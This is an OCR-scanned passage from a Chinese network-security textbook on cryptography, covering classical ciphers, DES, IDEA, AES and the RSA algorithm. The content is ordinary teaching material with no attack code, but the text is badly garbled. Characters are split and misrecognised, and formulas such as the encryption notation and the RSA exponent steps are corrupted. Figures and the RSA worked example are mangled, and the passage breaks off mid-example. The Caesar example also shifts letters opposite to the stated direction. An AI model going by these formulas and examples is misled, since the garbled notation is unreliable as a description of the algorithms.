因为 考试 试卷 是 属于 机 密 资 料 ,在 通过 电子 邮件 传送 试卷 时 ,一 定 要 采取 加 密 等 保密 措 
施 ,防止 邮件 内 容 被 第 三 方 所 窃取 或 自 改 。 另 外 ,还 应 该 对 试卷 邮件 进行 数字 签名 ,这 样 可 
以 确认 发 送 方 的 身份 ,防止 第 三 方 冒 充 发 送 方 或 算 改 邮件 内 容 。 还 有 ,一 般 只 能 对 邮件 的 正 
文 内 容 或 附件 内 容 进行 加 密 ,而 不 能 对 邮件 主题 进行 加 密 , 所 以 邮件 主题 中 不 要 出 现 敏 感 信 
息 , 如 “期 末 考 试 试题 ", 这 样 极 容易 引起 第 三 方 的 好 奇 和 兴趣 ,导致 对 邮件 内 容 的 破解 和 
攻击 。 


项 目 5 密码 技术 


53 相关 知识 点 


5.3.1 密码 学 的 基础 知识 


密码 学 早 在 公元 前 400 多 年 就 已 经 产生 了 ,正如 《破译 者 ) 一 书 中 所 说 “人 类 使 用 密码 的 
历史 几乎 与 使 用 文字 的 时 间 一 样 长 ”。 密 码 学 的 起 源 的 确 要 追溯 到 人 类 刚刚 出 现 ,并 且 尝试 
去 学 习 如 何 通 信 的 时 候 ,为 了 确保 他 们 通信 的 机 密 , 最 先是 有 意识 地 使 用 一 些 简 单 的 方法 来 
加 密 信息 ,通过 一 些 (密码 ) 象形 文字 相互 传达 信息 。 接 着 ,由 于 文字 的 出 现 和 使 用 ,确保 
通信 的 机 密 性 就 成 为 一 种 艺术 ,古代 发 明了 不 少 加密 信 息 和 传达 信息 的 方法 。 例 如 我 国 古 
代 的 烽火 就 是 一 种 传递 军情 的 方法 ,再 如 古代 的 兵 符 就 是 用 来 传达 信息 的 密令 ,这 些 都 促进 
了 密码 学 的 发 展 。 

密码 学 真正 成 为 科学 是 在 19 世纪 末 和 20 世纪 初期 ,由 于 军事 、 数 学 .通信 等 相关 技术 
的 发 展 , 特 别 是 两 次 世界 大 战 中 对 军事 信息 保密 传递 和 破获 敌 方 信息 的 需求 ,密码 学 得 到 了 
空前 的 发 展 ,并 广泛 地 应 用 于 军事 情报 部 门 的 决策 。 例 如 ,在 第 二 次 世界 大 战 之 前 ,德国 就 
试验 并 使 用 了 一 种 命名 为 “ 谜 ” 的 密码 机 ,“ 迹 ”型 机 能 产生 220 亿 种 不 同 的 密 钥 组 合 , 假 如 一 
个 人 日 夜 不 停 地 工作 ,每 分 钟 测试 一 种 密 钥 ,需要 约 4. 2 万 年 才能 将 所 有 的 密 钥 组 合 试 完 。 
然而 ,英国 获知 了 “ 迹 ” 型 机 的 密码 原理 ,完成 了 一 部 针对 “ 迹 ” 型 机 的 绰号 叫 “ 炸 弹 ” 的 密码 破 
译 机 ,每 秒 钟 可 处 理 2000 个 字符 , 它 几 乎 可 以 破译 截获 德国 的 所 有 情报 。 后 来 又 研制 出 一 
种 每 秒 钟 可 处 理 5000 个 字符 的 “巨人 "型 密码 破译 机 并 投入 使 用 ,至 此 同盟 国 几 乎 掌握 了 德 
国 纳粹 的 绝 大 多 数 军事 秘密 和 机 密 ,而 德国 军 方 却 对 此 一 无 所 知 ; 太 平 洋 战 争 中 ,美军 成 功 
破译 了 日 本 海军 的 密码 机 , 读 懂 了 日 本 舰队 司令 官 山本 五 十 六 发 给 各 指挥 官 的 命令 ,在 中 途 
岛 彻 底 击 退 了 日 本 海军 ,导致 太平 洋 战争 的 决定 性 转折 。 因 此 .可 以 说 密码 学 为 战争 的 胜利 
立 了 大 功 。 今 天 ,密码 学 不 仅 用 于 国家 军事 安全 ,人 们 已 经 将 重点 更 多 地 集中 在 实际 应 用 
中 。 现 实生 活 中 就 有 很 多 密码 ,例如 为 了 防止 别人 查阅 你 的 文件 ,可 以 将 你 的 文件 加 密 ;为 
了 防止 窃取 钱 物 ,可 以 在 银行 账户 上 设置 密码 等 。 随 着 科技 的 发 展 和 信息 保密 的 需求 ,密码 
学 的 应 用 融入 了 人 们 的 日 常生 活 。 

密码 学 (Cryptography) 一 词 来 自 希腊 语 中 的 短语 “secret writing”( 秘 密 地 书写 ), 是 
研究 数据 的 加 密 及 其 变换 的 学 科 。 它 集 数学 、 计 算 机 科学 、 电 子 与 通信 等 诸多 学 科 于 一 身 ， 
它 包 括 两 个 分 支 :密码 编码 学 和 密码 分 析 学 。 密 码 编码 学 主要 研究 对 信息 进行 变换 ,以 保护 
信息 在 传递 过 程 中 不 被 敌 方 窃取 、 解 读 和 利用 的 方法 ,而 密码 分 析 学 则 与 密码 编码 学 相反 ， 
它 主要 研究 如 何 分 析 和 破译 密码 。 这 两 者 之 间 既 相互 对 立 又 相互 促进 。 

进入 20 世纪 80 年 代 , 随 着 计算 机 网 络 .特别 是 互联 网 的 普及 ,密码 学 得 到 了 广泛 的 重 
视 。 如 今 ,密码 技术 不 仅 服务 于 信息 的 加 密 和 解密 :还 是 身份 认证 、 访 问 控制 .数字 签名 等 多 
种 安全 机 制 的 基础 。 

加 密 技 术 包括 密码 算法 设计 、 密 码 分 析 、 安 全 协议 .身份 认证 、 消 息 确认 .数字 签名 、 密 钥 
管理 、 密 钥 托管 等 技术 ,是 保障 信息 安全 的 核心 技术 。 


119 


网 络 安全 技术 项 目 化 教程 


待 加 密 的 消息 称 为 明文 (Plaintext) , 它 经 过 一 个 以 密 钥 (Key) 为 参数 的 函数 变换 ,这 
个 过 程 称 为 加 密 , 输 出 的 结果 称 为 密 文 (Ciphertext) .然后 , 密 文 被 传送 出 去 ,往往 由 通信 员 
或 者 无 线 电 方式 来 传送 。 我 们 假设 敌人 或 者 入 侵 者 听 到 了 完整 的 密 文 ,并 且 将 密 文 精确 地 
复制 下 来 。 然 而 ,与 目标 接收 者 不 同 的 是 ,他 不 知道 解密 密 钥 是 什么 ,所 以 他 无 法 轻易 地 对 
密 文 进行 解密 。 有 时 候 入 侵 者 不 仅 可 以 监听 通信 信道 (被 动人 侵 者 ) ,而 且 还 可 以 将 消息 记 
录 下 来 并 且 在 以 后 某 个 时 候 回 放出 来 ,或 者 插入 他 自己 的 消息 ,或 者 在 合法 消息 到 达 接 收 方 
之 前 对 消息 进行 自 改 主动 人 侵 者 ) 。 

用 一 种 合适 的 标记 法 将 明文 、 密 文 和 密 钥 的 关系 体现 出 来 .这 往往 会 非常 有 用 。 我 们 将 
使 用 C = Erk(CP) 来 表示 用 密 钥 KK 加 密 明 文 P 得 到 密 文 C ,类 伏地 ,P = Dx (C) 代 表 用 密 
钥 开 解密 密 文 C 得 到 明文 P 的 过 程 。 由 此 可 得 到 : 

Dk(Er(P))=P 

这 种 标记 法 也 说 明了 EE 和 D 只 是 数学 函数 ,事实 上 也 确实 如 此 。 

密码 学 的 基本 规则 是 ,你 必须 假定 密码 分 析 者 知道 加 密 和 解密 所 使 用 的 方法 。 即 密码 
分 析 者 知道 图 5-1 中 加 密 方 法 E 和 解密 方法 D 的 所 有 工作 细节 。 每 次 当 旧 的 加 解密 方法 
被 泄露 (或 者 认为 它们 已 被 泄露 ) 以 后 ,总 是 需要 极 大 的 努力 来 重新 设计 、 测 试 和 安装 新 的 算 
法 ,这 使 得 将 加 密 算 法 本 身 保持 秘密 的 做 法 在 现实 中 并 不 可 行 。 当 一 个 算法 已 不 再 保密 的 
时 候 而 仍然 认为 它 是 保密 的 ,这 将 会 带 来 更 大 的 危害 。 


、 主 动 入 侵 者 
可 以 修改 


密 钥 源 


图 5-1 加 密 模型 (假定 使 用 了 对 称 密 钥 密码 ) 


5.3.2 古典 密码 技术 


从 密码 学 发 展 历程 来 看 ,可 分 为 古典 密码 技术 (以 字符 为 基本 加 密 单元 的 密码 ) 以 及 
现代 密码 技术 (以 信息 块 为 基本 加 密 单 元 的 密码 ) 两 类 。 而 古典 密码 技术 有 着 悠久 的 历 
中 ,从 古代 一 直到 计算 机 出 现 以 前 ,古典 密码 技术 主要 有 以 下 两 大 基本 方法 。 

@ 代替 密码 :就 是 将 明文 的 字符 蔡 换 为 密 文 中 的 另 一 种 的 字符 ,接收 者 只 要 对 密 文 做 
反 向 替换 就 可 以 恢复 出 明文 。 

@ 置换 密码 (又 称 易 位 密码 ) :明文 的 字母 保持 相同 ,但 顺序 被 打 乱 了 。 

古典 密码 算法 大 都 十 分 简单 ,现在 已 经 很 少 在 实际 应 用 中 使 用 了 。 但 是 对 古典 密码 学 
的 研究 ,对 于 理解 ,构造 和 分 析 现 代 实 用 的 密码 都 是 很 有 帮助 的 .下面 是 几 种 简单 的 古典 密 
码 算 法 。 
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1. 滚 简 密 码 


在 古代 ,为 了 确保 通信 的 机 密 ,先是 有 意识 地 使 用 一 些 简单 的 方法 对 信息 进行 加 密 。 如 
公元 六 年 前 的 古 希 腊 人 通过 使 用 一 根 叫 scytale 的 棍子 对 信息 进行 加 密 。 送 信人 先 将 一 张 
羊皮 条 绕 棍子 螺旋 形 卷 起 来 ,如 图 5-2 所 示 ,然后 把 要 写 的 信息 按 某 种 顺序 写 在 上 面 ,接着 
打开 羊皮 条 卷 , 通 过 其 他 渠道 将 信 送 给 收 信 人 。 如 果 不 知道 棍子 的 直径 (这 里 作为 密 钥 ) 
就 不 容易 解密 里 面 的 内 容 , 但 是 收 信 人 可 以 根据 事先 和 写 信人 的 约定 ,用 同样 直径 的 
scytale 棍子 将 书信 和 解密 。 


2. 掩 格 密码 


16 世纪 米兰 的 物理 学 家 和 数学 家 Cardano 发 明了 掩 格 密码 ,如 图 5-3 所 示 ,可 以 事先 设 
计 好 方 格 的 开 孔 ,将 所 要 传递 的 信息 和 一 些 其 他 无 关 的 符号 组 合成 无 效 的 信息 ,使 截获 者 难 
以 分 析出 有 效 信息 。 


明文 为 
TRANSPOSITIONCIPHERS 


密 文 为 
TRSCAIINTPSIHPOEONRS 


小 明 早晨 一 起 床 上 中 
就 看 到 桌 上 放 着 
六 块 甜点 心 ， 他 上 


图 5-3 掩 格 密码 


3. 棋盘 密码 


我 们 可 以 建立 一 张 表 , 如 图 5-4 所 示 ,使 每 一 个 字符 对 应 一 数 (该 字符 所 在 行 标号 十 列 
标号 ) 。 这 样 将 明文 变 成 形式 为 一 串 数字 的 密 文 。 

例如 ,明文 为 battle on Sunday, 密 文 为 121144443115034330434533141154 (其 中 0 表 
示 空 格 ) 。 


4. 恺 撒 (Caesar) 密码 


据 记载 在 罗马 帝国 时 期 , 恺 撤 大 帝 曾经 设计 过 一 种 简单 的 移 位 密码 ,用 于 战 时 通信 。 这 
种 加 密 方法 就 是 将 明文 的 字母 按照 字母 顺序 , 往 后 依次 递 推 相同 的 位 数 ,就 可 以 得 到 加 密 的 
密 文 ,而 解密 的 过 程 正好 和 加 密 的 过 程 相反 。 

例如 ,明文 为 battle on Sunday, 密 文 为 yxqqib lk Prkaxv (将 字母 依次 后 移 3 位 , 即 K 一 一 3) 。 
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0 1 2 3 4 5 
1 A B C D E 
2 F G H I kK 
3 L M N oO 了 


4 Q RS T U 
5VWXYT Zz 
图 5-4 棋盘 密码 


如 果 令 26 个 字母 分 别 对 应 于 整数 00 一 25( 用 两 位 数 表示 ) ,a 二 01,b=02,c==03,… 
y 二 25,z 二 00, 则 恺 撤 加 密 方法 实际 上 是 进行 了 一 次 数学 取 模 为 26 的 同 余 运算 , 即 
C=P+K (mod 26) 
其 中 ,P 是 对 应 的 明文 ;C 是 与 明文 对 应 的 密 文 数据 ;K 是 加 密 用 的 参数 ,又 称 密 钥 。 
例如 ,battle on Sunday 对 应 的 明文 数据 序列 为 020120201205 1514 192114040125 。 
若 取 密 钥 开 为 5 时 , 则 密 文 数据 序列 为 070625251710 2019 240019090604。 


5. 圆 盘 密码 


由 于 恺 撤 密码 加 密 的 方法 很 容易 被 截获 者 通过 对 密 钥 赋值 (1 一 25) 的 方法 破解 ,人 们 
又 进一步 将 其 改善 ,只 要 将 字母 按照 不 同 的 顺序 进行 移动 就 可 以 提高 破解 的 难度 ,增加 信息 
的 保密 程度 。 如 15 世纪 佛罗伦萨 人 Alberti 发 明 圆 盘 密码 就 是 这 种 典型 的 利用 单 表 置换 的 
加 密 方法 。 在 两 个 同心 圆 盘 上 ,内盘 按 不 同 (杂乱 ) 的 顺序 填 好 字母 或 数字 ,而 外 盘 按 照 一 
定 顺序 填 好 字母 或 数字 ,如 图 5-5 所 示 ,转动 圆 盘 就 可 以 找到 字母 的 置换 方法 ,很 方便 地 进 
行 信息 的 加 密 与 解密 。 恺 撤 密 码 与 圆 盘 密码 本 质 都 是 一 样 的 ,都 属于 单 表 置 换 , 即 一 个 明文 
字母 对 应 的 密 文字 母 是 确定 的 ,截获 者 可 以 分 析 字 母 出 现 的 频率 ,对 密码 体制 进行 有 效 的 
攻击 。 


6. 维 吉 尼 亚 (Vigenere) 密码 


为 了 提高 密码 破译 的 难度 ,人 们 又 发 明了 一 种 多 表 置 换 的 密码 , 即 一 个 明文 字母 可 以 表 
示 为 多 个 密 文字 母 , 多 表 密 码 加 密 算 法 结果 将 使 得 对 单 表 置换 用 的 简单 频率 分 析 方 法 失效 ， 
其 中 维 吉 尼 亚 密码 就 是 一 种 典型 的 加 密 方 法 ,如 图 5-6 所 示 。 

维 吉 尼 亚 密 码 是 使 用 一 个 词组 (或 语句 ) 作为 密 钥 ,词组 中 每 一 个 字母 都 作为 移 位 替 
换 密码 密 钥 确定 一 个 替换 表 , 维 吉 尼 亚 密码 循环 地 使 用 每 一 个 替换 表 完 成 明文 字母 到 密 文 
字母 的 变换 ,最 后 所 得 到 的 密 文字 母 序列 即 为 加 密 得 到 的 密 文 .具体 过 程 如 下 。 

例如 ,假设 明文 已 = data security, 密 钥 玉 王 best。 可 以 先 将 P 分 解 为 长 为 4 的 序列 
data secu rity。 每 一 节 利 用 密 钥 玉 王 best 加 密 得 密 文 C = Ek (P)== EELT TIUN SMLR。 
当 密 钥 K 取 的 词组 很 长 时 ,截获 者 就 很 难 将 密 文 破解 。 
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维 吉 尼 亚 多 表 置 换 图 


图 5-6 


圆 盘 密码 


图 5-5 


对 称 密码 技术 
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现代 密码 算法 不 再 依赖 算法 的 保密 ,而 是 把 算法 和 密 钥 分 开 , 其 中 ,算法 可 以 公开 ,而 密 
钥 是 保密 的 ,密码 系统 的 安全 性 在 于 保持 密 钥 的 保密 性 。 如 果 加 密 密 钥 和 解密 密 钥 相同 ,或 


对 称 密码 技术 加 密 速度 快 ， 


使 用 的 加 密 算法 简单 .安全 强度 高 ,但 是 密 钥 的 完全 保密 较 难 实现 ,此 外 ,大 系统 中 密 钥 的 管 


可 以 从 一 个 推出 另 一 个 ,一般 称 其 为 对 称 密 钥 或 单 钥 密码 体制 。 
理 难度 也 较 大 。 


对 称 密码 技术 原理 
对 称 加 密 算法 是 应 用 较 早 的 加 密 算法 ,技术 成 熟 。 在 对 称 加 密 算法 中 ,使 用 的 密 钥 只 有 


1, 


发 送 方 和 接收 方 都 使 用 这 个 密 钥 对 数据 进行 加 密 或 解密 ,这 就 要 求解 密 方 事先 必须 知 


道 加 密 密 钥 ,其 通信 模型 如 图 5-7 所 


一 个 


示 。 


,| 解密 算法 | 明文 m 、 
m=D,(C) 
接收 方 


密 钥 K 


加 密 算法 | 密 文 C 
C=E,(m) 


| 


明文 m 


发 送 方 


图 5-7 对 称 密 钥 密码 体制 的 通信 模型 


123 


息 在 实践 上 是 不 可 能 的 ;第 二 :加 密 方 法 的 安全 性 依赖 于 密 钥 的 保密 


后 


对 称 密码 系统 的 安全 性 依赖 于 以 下 两 个 因素 :第 一 ,加 密 算法 必须 是 足够 强 的 ,仅仅 基 
于 密 文本 身 去 解密 人 
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性 ,而 不 是 算法 的 秘密 性 。 对 称 密码 系统 可 以 以 硬件 或 软件 的 形式 实现 ,其 算法 实现 速度 很 
快 ,并 得 到 了 广泛 的 应 用 。 

对 称 加 密 算 法 的 特点 是 算法 公开 ,计算 量 小 .加 密 速 度 快 .加 密 效 率 高 。 不 足 之 处 是 通 
信 双 方 使 用 同一 个 密 钥 安全 性 得 不 到 保证 。 

此 外 ,如 果 有 个 用 户 相 互 之 间 进 行 保密 通信 ,车 每 对 用 户 使 用 不 同 的 对 称 密 钥 , 则 密 
钥 总 数 将 达到 n(n 一 1)/2 个 , 当 n 值 较 大 时 ,n(n 一 1)/2 值 会 很 大 ,这 使 得 密 钥 的 管理 很 难 。 

常用 的 对 称 加 密 算法 有 DES 算法 .IDEA 算法 和 AES 算 法 等 。 

2. DES 算法 

DES 算法 的 发 明 人 是 IBM 公司 的 W. Tuchman 和 C. Meyer。 美 国 商业 部 国家 标准 
局 (NBS) 于 1973 年 5 月 和 1974 年 8 月 两 次 发 布 通告 ,公开 征求 用 于 计算 机 的 加 密 算法 ， 
经 评选 ,从 一 大 批 算法 中 采纳 了 IBM 的 LUCIFER 方案 ,该 算法 于 1976 年 11 月 被 美国 政 
府 采用 ,随后 被 美国 国家 标准 局 和 美国 国家 标准 协会 (ANSI) 承认 ,并 于 1977 年 1 月 以 数 
据 加 密 标 准 DES (Data Encryption Standard) 的 名 称 正式 向 社会 公布 ,并 于 1977 年 7 月 
15 日 生效 。 

DES 算法 是 一 种 对 二 元 数据 进行 加 密 的 分 组 密码 ,数据 分 组 长 度 为 64 位 (8 字 节 ), 密 
文 分 组 长 度 也 是 64 位 ,没有 数据 扩展 。 密 钥 长 度 为 64 位 ,其 中 有 效 密 钥 长 度 为 56 位 ,其 余 
8 位 作为 奇偶 校 验 。DES 算法 的 整个 体制 是 公开 的 ,系统 的 安全 性 主要 依赖 密 钥 的 保密 ,其 
算法 主要 由 初始 置换 IP、16 轮 和 迭代 的 乘积 变换 、. 逆 初始 置换 IP 一 以 及 16 个 子 密 钥 产生 器 构 
成 。56 位 DES 加 密 算 法 的 框图 如 图 5-8 所 示 。 


64 位 明文 56 位 密 钥 


[at | | 置换 选择 2 | 区 入 到 左 移 
TEST 置换 选择 2 RE 


64 位 密 文 
图 5-8 56 位 DES 加 密 算法 的 框图 


DES 加 密 算 法 框图 中 ,明文 加 密 过 程 如 下 。 
加 将 长 的 明文 分 割 成 64 位 的 明文 段 , 逐 段 加 密 。 将 64 位 明文 段 首先 进行 与 密 钥 无 关 
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的 初始 变 位 处 理 。 

@ 初始 变 位 后 的 结果 要 进行 16 次 的 迭代 处 理 ,每 次 欠 代 的 框图 相同 ,但 参加 迁 代 的 密 
钥 不 同 , 密 钥 共 56 位 ,分 成 左右 两 个 28 位 ,第 i 次 迭代 用 密 钥 K; 参加 操作 ,第 i 次 近代 完 
成 后 ,左右 28 位 的 密 钥 都 作 循环 移 位 ,形成 第 i 十 1 次 迭代 的 密 钥 。 

@ 经 过 16 次 迭代 处 理 后 的 结果 进行 左右 32 位 的 互 换 位 置 。 

@ 将 结果 进行 一 次 与 初始 置 位 相 逆 的 还 原 置换 处 理 得 到 了 64 位 的 密 文 。 

上 述 加 密 过 程 中 的 基本 运算 包括 置 位 .替代 和 蜡 或 运算 。DES 算法 是 一 种 对 称 算 法 
( 单 钥 加 密 算法 ), 既 可 用 于 加 密 , 也 可 用 于 解密 。 解 密 的 过 程 和 加 密 时 相似 ,但 密 钥 使 用 顺 
序 刚好 相反 。 

DES 是 一 种 分 组 密码 ,是 两 种 基本 的 加 密 组 块 蔡 代 和 和 置 位 的 细致 而 复杂 的 结合 , 它 通 
过 反复 依次 应 用 这 两 项 技术 来 提高 其 强度 ,经 过 共 16 轮 的 迭代 和 和 置 位 的 变换 后 ,使 得 密码 
分 析 者 无 法 获得 除 该 算法 一 般 特性 以 外 的 更 多 信息 。 对 于 DES 加 密 , 除 了 尝试 所 有 可 能 的 
密 钥 外 ,还 没有 已 知 的 技术 可 以 求 得 所 用 的 密 钥 。DES 算法 可 以 通过 软件 或 硬件 来 实现 。 

自 DES 成 为 美国 国家 标准 以 来 ,已 经 有 许多 公司 设计 并 推广 了 实现 DES 算法 的 产品 ， 
有 的 设计 专用 LSI 器 件 或 芯片 ,有 的 用 现成 的 微 处 理 器 实现 ,有 的 只 限于 实现 DES 算法 ,有 
的 则 可 以 运行 各 种 工作 模式 。 

针对 DES 密 钥 短 的 问题 ,科学 家 又 研制 了 三 重 DES( 或 称 3DES) ,把 密 钥 长 度 提高 到 
112 位 或 168 位 。 


3. IDEA 算法 


国际 数据 加 密 算法 IDEA 是 由 瑞士 科学 者 提出 的 , 它 在 1990 年 正式 公布 并 在 之 后 得 到 
增强 。IDEA 算法 是 在 DES 算法 的 基础 上 发 展 而 来 的 ,类 似 于 三 重 DES。 它 也 是 对 64 位 
大 小 的 数据 块 加密 的 分 组 加 密 算 法 , 密 钥 长 度 为 128 位 , 它 基 于 “ 相 异 代数 群 上 的 混合 运算 ” 
思想 设计 算法 ,用 硬件 和 软件 实现 都 很 容易 , 且 比 DES 在 实现 上 快 得 多 。IDEA 自问 世 以 
来 ,已 经 历 了 大 量 的 验证 ,对 密码 分 析 具 有 很 强 的 抵抗 能 力 , 在 多 种 商业 产品 中 被 使 用 。 
IDEA 的 密 钥 长 度 为 128 位 ,这 么 长 的 密 钥 在 今后 若干 年 内 应 该 是 安全 的 。 

IDEA 算法 也 是 一 种 数据 块 加 密 算法 , 它 设计 了 一 系列 的 加 密 轮 次 ,每 轮 加 密 都 使 用 从 
完整 的 加 密 密 钥 中 生成 的 一 个 子 密 钥 。 与 DES 不同 之 处 在 于 , 它 采用 软件 实现 和 硬件 实现 
同样 快速 。 

由 于 IDEA 是 在 美国 之 外 提出 并 发 展 起 来 的 . 避 开 了 美国 法 律 上 对 加 密 技 术 的 诸多 限 
制 , 因 此 ,有 关 IDEA 算法 和 实现 技术 的 书籍 可 以 自由 出 版 和 交流 , 极 大 地 促进 了 IDEA 的 
发 展 和 完善 。 

4. AES 算法 


密码 学 中 的 AES(Advanced Encryption Standard, 高 级 加 密 标 准 ) 算 法 ,又 称 Rijndael 

加 密 算法 ,是 美国 联邦 政府 采用 的 一 种 区 块 加 密 标准 。 这 个 标准 用 来 替代 原先 的 DES, 已 

经 被 多 方 分 析 且 广 为 全 世界 所 使 用 。 经 过 五 年 的 甄选 流程 ,高 级 加 密 标 准 由 美国 国家 标准 

与 技术 研究 院 (NIST) 于 2001 年 11 月 26 日 发 布 于 FIPS PUB 197. 并 在 2002 年 5 月 26 日 
成 为 有 效 的 标准 。2006 年 ,高 级 加 密 标准 已 然 成 为 对 称 密 钥 加 密 中 最 流行 的 算法 之 一 。 
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该 算法 是 比利时 密码 学 家 Joan Daemen 和 Vincent Rijmen 所 设计 的 ,结合 两 位 作者 的 
名 字 , 命 名 为 Rijndael. 投 稿 高 级 加 密 标 准 的 甄选 流程 。 

AES 是 美国 国家 标准 技术 研究 所 NIST 旨 在 取代 DES 的 21 世纪 的 加 密 标准 。 

AES 的 基本 要 求 是 ,采用 对 称 分 组 密码 体制 , 密 钥 长 度 为 128 位 .192 位 .256 位 ,分 组 
长 度 为 128 位 ,算法 应 易于 各 种 硬件 和 软件 实现 。1998 年 NIST 开始 AES 第 一 轮 分 析 、 测 
试 和 征集 ,共产 生 了 15 个 候选 算法 。1999 年 3 月 完成 了 第 二 轮 AES 的 分 析 测试 。2000 年 
10 月 2 日 美国 政府 正式 宣布 选中 比利时 密码 学 家 Joan Daemen 和 Vincent Rijmen 提出 的 
一 种 密码 算法 Rijndael 作为 AES。 

在 应 用 方面 ,尽管 DES 在 安全 上 是 脆弱 的 ,但 由 于 快速 DES 芯片 的 大 量 生产 ,使 得 
DES 仍 能 暂时 继续 使 用 ,为 提高 安全 强度 ,通常 使 用 独立 密 钥 的 三 重 DES。 但 是 DES 迟早 
要 被 AES 代替 。 

目前 , 几 种 对 称 加 密 算法 都 在 不 同 的 场合 得 到 具体 应 用 , 几 种 对 称 加 密 算法 的 比较 如 
表 5-1 所 示 。 

表 5-1 几 种 对 称 加 密 算法 的 比较 


算法 密 钥 长 度 (bit) 分 组 长 度 (bit) 循环 次 数 
DES 56 64 16 

三 重 DES 112、168 64 48 

IDEA 128 64 8 

AES 128、192、256 128 10、.12、14 
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若 加 密 密 钥 和 解密 密 钥 不 相同 ,或 从 其 中 一 个 难以 推出 另 一 个 , 则 称 为 非 对称 密 码 技术 
或 双 钥 密码 技术 ,也 称 为 公开 密 钥 技术 。 非 对 称 密 码 算法 使 用 两 个 完全 不 同 但 又 完全 匹配 
的 一 对 密 钥 一 一 公 钥 和 私 钥 。 公 钥 是 可 以 公开 的 ,而 私 钥 是 保密 的 。 


1. 非 对 称 密 码 技术 原理 


1976 年 ,Diffie 和 Hellman 在 “密码 学 的 新 方向 "一 文中 提出 了 公开 密 钥 密码 体制 的 思 
想 , 开 创 了 现代 密码 学 的 新 领域 。 

非 对 称 密码 技术 的 加 密 密 钥 和 解密 密 钥 不 相同 ,它们 的 值 不 等 ,属性 也 不 同 ,一 个 是 可 
以 公开 的 公 钥 ; 另 一 个 则 是 需要 保密 的 私 钥 。 非 对 称 密 码 技术 的 特点 是 加 密 能 力 和 解密 能 
力 是 分 开 的 , 即 加 密 与 解密 的 密 钥 不 同 ,或 从 一 个 难以 推出 男 一 个 。 它 可 以 实现 多 个 用 户 用 
公 钥 加 密 的 消息 只 能 由 一 个 用 户 用 私 钥 解 读 , 或 反 过 来 .由 一 个 用 户 用 私 钥 加 密 的 消息 可 被 
多 个 用 户 用 公 钥 解读 。 其 中 前 一 种 方式 可 用 于 在 公共 网 络 中 实现 保密 通信 ;后 一 种 方式 可 
用 于 在 认证 系统 中 对 消息 进行 数字 签名 。 

非 对 称 密 钥 密码 体制 的 通信 模型 如 图 5-9 所 示 。 

非 对 称 加 密 算法 的 主要 特点 如 下 。 

中 用 加 密 密 钥 PK( 公 钥 ) 对 明文 m 加 密 后 得 到 密 文 .再 用 解密 密 钥 SK( 私 钥 ) 对 密 文 
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解密 

解密 算法 

m=Ds(C) 

发 送 方 接收 方 
图 5-9 非 对 称 密 钥 密 码 体制 的 通信 模型 


解密 , 即 可 恢复 出 明文 m, 即 
Dsx (下 pk (1m))=m 
@ 加 密 密 钥 不 能 用 来 解密 , 即 
DPpx CEpk (1m))F¥m; Dsx (Esx(m))Am 
@ 用 PK 加 密 的 信息 只 能 用 SK 解密 ;用 SK 加 密 的 信息 只 能 用 PK 解密 。 
@ 从 已 知 的 PK 不 可 能 推导 出 SK。 
@ 加 密 和 解密 的 运算 可 对 调 , 即 
下 pk (Dsk (11))=m 
非 对 称 密码 体制 大 大 简化 了 复杂 的 密 钥 分 配 管理 问题 ,但 非 对 称 加 密 算法 要 比 对 称 加 
密 算法 慢 得 多 ( 约 差 1 000 售 )。 因 此 .在 实际 通信 中 , 非 对 称 密码 体制 主要 用 于 认证 (比如 
数字 签名 .身份 识别 等 ) 和 密 钥 管理 等 ,而 消息 加 密 仍 利用 对 称 密码 体制 。 非 对 称 密码 体制 
的 杰出 代表 是 RSA 算法 。 


2. RSA 算法 


RSA 算法 是 由 美国 麻 省 理工 学 院 的 Rivest、Shamir 和 Adleman 三 位 科学 家 设计 的 用 
数论 构造 双 钥 的 方法 ,是 公开 密 钥 密码 系统 的 加 密 算法 的 一 种 . 它 不 仅 可 以 作为 加 密 算法 来 
使 用 ,而 且 可 以 用 作 数 字 签名 和 密 钥 分 配 与 管理 。RSA 在 全 世界 已 经 得 到 了 广泛 的 应 用 ， 
ISO 在 1992 年 颁布 的 国际 标准 X. 509 中 ,将 RSA 算法 正式 纳入 国际 标准 。1999 年 ,美国 
参议 院 通 过 立法 ,规定 电子 数字 签名 与 手写 签名 的 文件 .邮件 在 美国 具有 同等 的 法 律 效力 。 
我 国 也 于 2004 年 8 月 28 日 发 布 了 (电子 签名 法 》, 并 于 2005 年 4 月 1 日 起 施行 。 在 互联 网 
中 广泛 使 用 的 电子 邮件 和 文件 加 密 软 件 PGP (Pretty Good Privacy) 也 将 RSA 作为 传送 会 
话 密 钥 和 数字 签名 的 标准 算法 。RSA 算法 的 安全 性 建立 在 数论 “大 数 分 解 和 素数 检测 ”的 
理论 基础 上 。 

(1) RSA 算法 表述 

@ 首先 选择 两 个 大 素数 p 和 g (典型 地 应 大 于 10'”, 且 p 和 g 是 保密 的 )。 

加 计算 n= pg 和 z= (p 一 1) X (g 一 1)(z 是 保密 的 )。 

@ 选择 一 个 与 = 互 素 (没有 公 因 子 ) 的 数 d。 

@ 找到 e, 使 其 满足 Q .e (mod =) = 1。 

计算 出 这 些 参数 后 ,下面 就 可 以 执行 加 /解密 了 。 首 先 将 明文 (可 以 看 做 是 一 个 位 串 ) 
分 成 块 ,每 块 有 上 位 (最 后 一 块 可 以 小 于 k 位 ), 这 里 是 满足 2*: 二 的 最 大 数 。 为 了 加 密 一 
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个 消息 了 ,可 计算 C = P“(mod n )。 为 了 解密 C. 只 要 计算 P 二 C" (modz) 即 可 。 可 以 证 
明 , 对 于 指定 范围 内 的 所 有 P, 加 密 和 解密 函数 互 为 反 函 数 。 为 了 执行 加 密 , 你 需要 e。 入; 
为 了 执行 解密 ,你 需要 4 和 mw。 因此 , 公 钥 是 由 (e,n) 对 组 成 的 ,而 私 钥 是 由 (4d,n) 对 组 
成 的 。 

图 5-10 举例 说 明了 RSA 算法 是 如 何 工作 的 。 


明文 (P) 密 文 (0O) 解密 后 
Wy ys R= 
符号 数值 已 P'(Mod 33) 年 Cmod33) ”符号 
S 19 6859 28 13492928512 19 
U 21 9261 21 1801088541 21 U 
芝 26 17576 20 1280000000 26 z 
A ol 1 1 1 1 A 
N 14 2744 5 78125 14 N 
N 14 2744 5 78125 14 N 
E 05 125 26 8031810176 5 E 
发 送 方 的 计算 
接收 方 的 计算 


图 5-10 RSA 算法 用 例 


这 里 ,我 们 选择 p = 3,g = 11 (实际 中 pg 为 大 质数 )。 

则 n = pg = 33,z =(p — 1)X(g— 1)= 20。 

因为 7 与 20 互 素 ,可 以 选择 d 二 7。 

